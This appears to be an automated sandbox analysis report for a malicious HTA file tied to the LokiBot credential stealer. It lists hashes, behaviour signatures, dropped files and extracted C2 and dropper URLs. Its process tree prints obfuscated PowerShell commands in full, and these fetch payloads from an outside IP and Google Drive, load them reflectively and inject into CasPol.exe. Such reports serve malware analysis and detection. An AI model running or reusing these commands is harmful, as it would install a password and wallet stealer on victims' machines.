Analysis

  • max time kernel
    150s
  • max time network
    130s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-10-2024 06:01

General

  • Target

    logicalwayofgreatthingswhichcreatedwithgreatwayofgood.hta

  • Size

    130KB

  • MD5

    16e67de00d1302e9720892be8ab6a06c

  • SHA1

    8e8ee3df01c4fb6efd9a5289f48b9795c2483063

  • SHA256

    4145c6882b855cfbe79cbe9f9359260d503b0733ef6c901a9f62dd273568e662

  • SHA512

    fe6d68bc44f8b2243e1f02e77bf4c39c1ddfe4b2c0ccbf2051da7d10641d06b1da5756e1e89806c09cdad06ea9ca4074a18e98416ece919dbdda55e530a19b0a

  • SSDEEP

    96:Eam7B6DJU946WJU92EYDF/9MM9/y80636sJU956t7T:Ea2wDJGWJtEYpJqsJtRT

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Extracted

Family

lokibot

C2

http://94.156.177.220/logs/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\logicalwayofgreatthingswhichcreatedwithgreatwayofgood.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4348
    • C:\Windows\SysWOW64\wInDoWSpOwErSHelL\V1.0\POWeRShEll.exe
      "C:\Windows\sYSTEM32\wInDoWSpOwErSHelL\V1.0\POWeRShEll.exe" "poWERSheLl.exE -EX bYpasS -NOp -w 1 -C DEvIcEcreDeNtIalDepLOymEnT ; IEX($(Iex('[sySTEM.tEXT.EnCODIng]'+[Char]0X3A+[cHAR]58+'utF8.geTsTRINg([SYStem.coNverT]'+[char]0X3A+[Char]0X3A+'FrombaSE64sTRInG('+[char]34+'JDYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQkVyZGVmSW5JVGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZU9odnlRR28sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBabnF2ekZSdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF3QnJheXl5LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBycEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1QlMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRldOQnIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYWxBbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzQzL25ld3RoaW5nc3dpdGhncmVhdGZ0dXJ1ZXdpdGhncmVhdGRheXdlbGxiZXR0ZXJmb3JtZS50SUYiLCIkZU5WOkFQUERBVEFcbmV3dGhpbmdzd2l0aGdyZWF0ZnR1cnVld2l0aGdyZWF0ZGF5d2VsbC52YnMiLDAsMCk7c3RBclQtU0xlZXAoMyk7c3RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcbmV3dGhpbmdzd2l0aGdyZWF0ZnR1cnVld2l0aGdyZWF0ZGF5d2VsbC52YnMi'+[chAr]0X22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3396
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpasS -NOp -w 1 -C DEvIcEcreDeNtIalDepLOymEnT
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:972
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\b34wruqy\b34wruqy.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2324
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES955A.tmp" "c:\Users\Admin\AppData\Local\Temp\b34wruqy\CSC67A10C681D4FC18140D0B61227D542.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4288
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\newthingswithgreatfturuewithgreatdaywell.vbs"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1336
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJEVuVjpjb01TUEVDWzQsMTUsMjVdLWpPaW4nJykoKCgnZ1VkaW1hZ2VVcmwgPSBHNUlodHRwczovL2RyaXZlLmcnKydvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkonKydKdjFGNnZTNHNVT3libkgtc0QnKyd2VWhCWXd1ciBHNUk7Z1Vkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVuJysndDtnVWRpbWEnKydnZUJ5dGVzID0gZ1Vkd2ViQ2xpZScrJ250LkRvd25sb2FkRGF0YShnVWRpbWFnZVVybCk7Z1VkaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoZycrJ1VkaW1hZ2VCeXRlcyk7Z1Vkc3RhcnRGbGFnID0gRzVJPDxCQVNFNjRfU1RBUlQ+Pkc1STtnVWRlbmRGbGFnID0gRzVJPDxCQVNFNjRfRU5EPj5HNUk7Z1Vkc3RhcnRJbmRleCA9IGdVZGltYWdlVGV4dC5JbmRleE9mKGdVZHN0YXJ0RmxhZyk7Z1VkZW5kSW5kZXggPSBnVWRpJysnbWFnZVRleHQuSW5kZXhPZihnVWRlbmRGbGFnKTtnVWRzdGFydEluZGV4IC1nZSAwIC1hbmQgZycrJ1UnKydkZW5kSW5kZXggLWd0IGdVZHN0YXJ0SW5kJysnZXg7Z1Vkc3QnKydhcnRJbmRleCArPSBnVWQnKydzdGFydEZsYWcuTGVuZ3RoO2dVZGJhc2U2NCcrJ0xlbmd0aCA9IGdVZGVuZEluZGV4IC0gZ1VkJysnc3RhcnRJbmRleDtnVWRiYXNlNjRDb21tYScrJ25kID0gZ1VkJysnaW1hZ2VUZXh0LlN1YnN0cmluZycrJyhnVWRzdGFyJysndEluZGV4LCAnKydnVWRiYXNlNjRMZW5ndGgpO2dVZGJhc2U2NFJldmVyc2VkICcrJz0gLWpvaW4gKGdVZGJhc2U2NENvbW1hbmQuJysnVG9DaGFyQXJyYXkoKSBXQlggRm9yRWFjaC1PYmplY3QgeyBnVWRfIH0pWy0xLi4tKGdVZGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07Z1VkY29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhnVWRiYXNlNjRSZXZlcnNlZCcrJyk7Z1VkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMJysnb2FkKGdVZGNvbW1hbmRCeXRlcyk7Z1VkdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChHNScrJ0lWQUlHNScrJ0kpO2dVJysnZHZhaU1ldGhvZC5JbnZva2UoZ1VkbnVsbCwgQChHNUl0eHQuUkZERFJDJysnTC8zNC8xNDEuNjcxLjMuMjkxLy86cHR0aEc1SSwgRzVJZGVzJysnYXRpdmFkb0c1SSwgRzVJZGVzYXRpdmEnKydkb0c1SSwgRzVJZGVzYXRpdmFkb0c1SSwgJysnRzVJQ2FzUG9sRzVJLCBHNUlkZXNhdGl2YWRvRzVJLCBHNUlkZXNhdGl2YWRvRzVJLEc1SWRlc2F0aXZhZG9HNUksRzVJZGVzYXRpdmFkb0c1SSxHNUlkZXNhdGl2JysnYWRvRzVJLEc1SWRlc2F0aXZhZG9HNUksRzVJZGVzYXRpdmFkb0c1SSxHJysnNUkxJysnRzVJLCcrJ0c1SWRlc2F0aXYnKydhZG9HNUkpKTsnKSAtY1JlUExBQ0UgICdHNUknLFtDSGFyXTM5IC1jUmVQTEFDRSdnVWQnLFtDSGFyXTM2LWNSZVBMQUNFICAoW0NIYXJdODcrW0NIYXJdNjYrW0NIYXJdODgpLFtDSGFyXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3052
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $EnV:coMSPEC[4,15,25]-jOin'')((('gUdimageUrl = G5Ihttps://drive.g'+'oogle.com/uc?export=download&id=1AIVgJJ'+'Jv1F6vS4sUOybnH-sD'+'vUhBYwur G5I;gUdwebClient = New-Object System.Net.WebClien'+'t;gUdima'+'geBytes = gUdwebClie'+'nt.DownloadData(gUdimageUrl);gUdimageText = [System.Text.Encoding]::UTF8.GetString(g'+'UdimageBytes);gUdstartFlag = G5I<<BASE64_START>>G5I;gUdendFlag = G5I<<BASE64_END>>G5I;gUdstartIndex = gUdimageText.IndexOf(gUdstartFlag);gUdendIndex = gUdi'+'mageText.IndexOf(gUdendFlag);gUdstartIndex -ge 0 -and g'+'U'+'dendIndex -gt gUdstartInd'+'ex;gUdst'+'artIndex += gUd'+'startFlag.Length;gUdbase64'+'Length = gUdendIndex - gUd'+'startIndex;gUdbase64Comma'+'nd = gUd'+'imageText.Substring'+'(gUdstar'+'tIndex, '+'gUdbase64Length);gUdbase64Reversed '+'= -join (gUdbase64Command.'+'ToCharArray() WBX ForEach-Object { gUd_ })[-1..-(gUdbase64Command.Length)];gUdcommandByt'+'es = [System.Convert]::FromBase64String(gUdbase64Reversed'+');gUdloadedAssembly = [System.Reflection.Assembly'+']::L'+'oad(gUdcommandBytes);gUdvaiMethod = [dnlib.IO.Home].GetMethod(G5'+'IVAIG5'+'I);gU'+'dvaiMethod.Invoke(gUdnull, @(G5Itxt.RFDDRC'+'L/34/141.671.3.291//:ptthG5I, G5Ides'+'ativadoG5I, G5Idesativa'+'doG5I, G5IdesativadoG5I, '+'G5ICasPolG5I, G5IdesativadoG5I, G5IdesativadoG5I,G5IdesativadoG5I,G5IdesativadoG5I,G5Idesativ'+'adoG5I,G5IdesativadoG5I,G5IdesativadoG5I,G'+'5I1'+'G5I,'+'G5Idesativ'+'adoG5I));') -cRePLACE 'G5I',[CHar]39 -cRePLACE'gUd',[CHar]36-cRePLACE ([CHar]87+[CHar]66+[CHar]88),[CHar]124))"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3412
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
              6⤵
                PID:876
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                6⤵
                  PID:5028
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                  6⤵
                  • Accesses Microsoft Outlook profiles
                  • Suspicious use of AdjustPrivilegeToken
                  • outlook_office_path
                  • outlook_win_path
                  PID:4876

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\POWeRShEll.exe.log

        Filesize

        2KB

        MD5

        3d086a433708053f9bf9523e1d87a4e8

        SHA1

        b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

        SHA256

        6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

        SHA512

        931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        12KB

        MD5

        4c884e4d92b8b9ba23920c46fa5184e6

        SHA1

        2100150ecfec1a5d9f5fc72f0f9c183e687a5078

        SHA256

        2ce0cfbacc8fc0e770a0cfa559eea7bae40589ac16ccd248b9fbe083dd2b05ce

        SHA512

        09e28c97b9b89972d7a19e5929722c989c1ef9da6ee1daac970562e2a3725df5065a6bf2bf24cacc940bd4e1c0c6a2a92ae6b64598301b0476c909bb37002f12

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        18KB

        MD5

        3059cfa608f8f3e273bcf7806eab54f2

        SHA1

        d810efdd646a2dc0a3cc5628fede1881cfc8219e

        SHA256

        231ff5068583e210a87845254bae1b15aeea18429aec4c2f1b43c500e9788bc5

        SHA512

        a5b49e3b1a235f22d53e72f775ad888117541dc696140dd734cab580ac45b8487c9ae47ec60dcceedac286301a8ca3002962ac43d5645f3739800ac7e4e95ef9

      • C:\Users\Admin\AppData\Local\Temp\RES955A.tmp

        Filesize

        1KB

        MD5

        cd53a64d6e40d2f23273182cec5ea09a

        SHA1

        08c45c2b49b74ccdd4e6d227d6e04694e115dce8

        SHA256

        791ba5d3a0f25885b1283d12da1bac8ae81963ca6b1cd50983f562ec36dd4557

        SHA512

        4c43ce8d6cf300bf0ec04527d7e500430df7a6b6c5e0b34e0284cd9914ca460fc9e5e179bca152e76c4fb81c3974f3d5fcf7bf9ec40add2044a104c2b9be98cf

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a1nuczzv.hky.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\b34wruqy\b34wruqy.dll

        Filesize

        3KB

        MD5

        e44bdb6070dbd87a8450e3a39cdef5cd

        SHA1

        7108ac1726bb50a8d67e573ae51922bbf278b0b8

        SHA256

        a5afd8c9bfd38d28ae24e27ddbf40284542074c913b8eabd7ff01a2a3d4f4e1a

        SHA512

        d5a0b2ab5caabc3b9c67df599c3d36ca5cfdf79e3bda1a69f18c11803c543b4e11db6cb102552b80094f1a6477faa7870c8859bf9bc2d1f2d29bdb8be5a6685f

      • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3227495264-2217614367-4027411560-1000\0f5007522459c86e95ffcc62f32308f1_423fd5c7-8559-4b8c-bf1f-c9d05c9f0fd3

        Filesize

        46B

        MD5

        c07225d4e7d01d31042965f048728a0a

        SHA1

        69d70b340fd9f44c89adb9a2278df84faa9906b7

        SHA256

        8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

        SHA512

        23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

      • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3227495264-2217614367-4027411560-1000\0f5007522459c86e95ffcc62f32308f1_423fd5c7-8559-4b8c-bf1f-c9d05c9f0fd3

        Filesize

        46B

        MD5

        d898504a722bff1524134c6ab6a5eaa5

        SHA1

        e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

        SHA256

        878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

        SHA512

        26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

      • C:\Users\Admin\AppData\Roaming\newthingswithgreatfturuewithgreatdaywell.vbs

        Filesize

        136KB

        MD5

        655d556c1a60114b9c1df43ca2d1b4e9

        SHA1

        c339a1fb6445b5a5701ef091b328727d2e0cd894

        SHA256

        8895b5c34239ed56abf05b8a381be9153b25baea8167aafceafec196375cd983

        SHA512

        5bcb9c205e7337199e6f7c8e261fe83d1202e6d0aa084648d6d3c00e4c970d47fdbb759494e9c1b9b0347d23d24c4fd561fea17247fec9c81ca3b124b09263ba

      • \??\c:\Users\Admin\AppData\Local\Temp\b34wruqy\CSC67A10C681D4FC18140D0B61227D542.TMP

        Filesize

        652B

        MD5

        ff851925ba841c9eae7c96b2ca953332

        SHA1

        47b71691b0459508219d23817eed59e6b50d4ffb

        SHA256

        0ead7697a3714ae1776a133b73f9699074e1598ce7bc016391634708c61a4e68

        SHA512

        e94423a55ae19fed44ac2ea0b5948cf469c927ba95ebd580454eb4ecf776220d82426e35c85f5c1f51b939538909b56a1f5449d54af78a210fd536856f3215e2

      • \??\c:\Users\Admin\AppData\Local\Temp\b34wruqy\b34wruqy.0.cs

        Filesize

        469B

        MD5

        b89fa3ea83594e6aed2a1cbc2ab03515

        SHA1

        2457f05ae6c56c192ad5d7c76694e7898ada53f8

        SHA256

        bd9c1570cad7cf95c39fa2a8be51a8851239e7f5cbf0bad032292f733fded0a0

        SHA512

        bf0334f84f3de804f868d3b447eaf98e9d6679b52015ac814cb8d71e2d3fdc90f482bfe5f2801f25a5bef0de53da747028e3d28149ac5fd5ec3cc835ca8c37aa

      • \??\c:\Users\Admin\AppData\Local\Temp\b34wruqy\b34wruqy.cmdline

        Filesize

        369B

        MD5

        6a8d048202f7b32a9efcbd47ee55fa53

        SHA1

        74ad9a3f82c3267bb9c8a7d833ae357a0cd631a3

        SHA256

        02960714aa824d5af970cdb924f1b3500751561643e1b2c897e63084dbe6ffcf

        SHA512

        5a8eb22f3e360f371d199ab0843bd427107196d4e792b62c72ced7fcddbd7a8ed764f919700676f944e30b5ee1aa92160a76326acb94ea5338ad410b685a8605

      • memory/972-29-0x0000000007410000-0x0000000007442000-memory.dmp

        Filesize

        200KB

      • memory/972-30-0x000000006DA60000-0x000000006DAAC000-memory.dmp

        Filesize

        304KB

      • memory/972-40-0x0000000006A40000-0x0000000006A5E000-memory.dmp

        Filesize

        120KB

      • memory/972-41-0x0000000007460000-0x0000000007503000-memory.dmp

        Filesize

        652KB

      • memory/972-42-0x0000000007E10000-0x000000000848A000-memory.dmp

        Filesize

        6.5MB

      • memory/972-43-0x00000000077C0000-0x00000000077DA000-memory.dmp

        Filesize

        104KB

      • memory/972-44-0x0000000007820000-0x000000000782A000-memory.dmp

        Filesize

        40KB

      • memory/972-45-0x0000000007A50000-0x0000000007AE6000-memory.dmp

        Filesize

        600KB

      • memory/972-46-0x00000000079C0000-0x00000000079D1000-memory.dmp

        Filesize

        68KB

      • memory/972-47-0x00000000079F0000-0x00000000079FE000-memory.dmp

        Filesize

        56KB

      • memory/972-48-0x0000000007A00000-0x0000000007A14000-memory.dmp

        Filesize

        80KB

      • memory/972-49-0x0000000007B10000-0x0000000007B2A000-memory.dmp

        Filesize

        104KB

      • memory/972-50-0x0000000007A40000-0x0000000007A48000-memory.dmp

        Filesize

        32KB

      • memory/3052-84-0x0000000006270000-0x00000000065C4000-memory.dmp

        Filesize

        3.3MB

      • memory/3396-71-0x00000000711AE000-0x00000000711AF000-memory.dmp

        Filesize

        4KB

      • memory/3396-4-0x00000000711A0000-0x0000000071950000-memory.dmp

        Filesize

        7.7MB

      • memory/3396-17-0x00000000057A0000-0x0000000005AF4000-memory.dmp

        Filesize

        3.3MB

      • memory/3396-7-0x0000000005730000-0x0000000005796000-memory.dmp

        Filesize

        408KB

      • memory/3396-65-0x0000000006300000-0x0000000006308000-memory.dmp

        Filesize

        32KB

      • memory/3396-19-0x0000000005D80000-0x0000000005DCC000-memory.dmp

        Filesize

        304KB

      • memory/3396-72-0x00000000711A0000-0x0000000071950000-memory.dmp

        Filesize

        7.7MB

      • memory/3396-73-0x0000000007110000-0x0000000007132000-memory.dmp

        Filesize

        136KB

      • memory/3396-74-0x00000000081C0000-0x0000000008764000-memory.dmp

        Filesize

        5.6MB

      • memory/3396-6-0x00000000056C0000-0x0000000005726000-memory.dmp

        Filesize

        408KB

      • memory/3396-5-0x0000000004DA0000-0x0000000004DC2000-memory.dmp

        Filesize

        136KB

      • memory/3396-18-0x0000000005D40000-0x0000000005D5E000-memory.dmp

        Filesize

        120KB

      • memory/3396-81-0x00000000711A0000-0x0000000071950000-memory.dmp

        Filesize

        7.7MB

      • memory/3396-0-0x00000000711AE000-0x00000000711AF000-memory.dmp

        Filesize

        4KB

      • memory/3396-1-0x0000000002460000-0x0000000002496000-memory.dmp

        Filesize

        216KB

      • memory/3396-2-0x00000000711A0000-0x0000000071950000-memory.dmp

        Filesize

        7.7MB

      • memory/3396-3-0x0000000004F90000-0x00000000055B8000-memory.dmp

        Filesize

        6.2MB

      • memory/3412-103-0x00000000080B0000-0x000000000814C000-memory.dmp

        Filesize

        624KB

      • memory/3412-102-0x0000000007F50000-0x00000000080AA000-memory.dmp

        Filesize

        1.4MB

      • memory/4876-105-0x0000000000400000-0x00000000004A2000-memory.dmp

        Filesize

        648KB

      • memory/4876-104-0x0000000000400000-0x00000000004A2000-memory.dmp

        Filesize

        648KB

      • memory/4876-129-0x0000000000400000-0x00000000004A2000-memory.dmp

        Filesize

        648KB

      • memory/4876-137-0x0000000000400000-0x00000000004A2000-memory.dmp

        Filesize

        648KB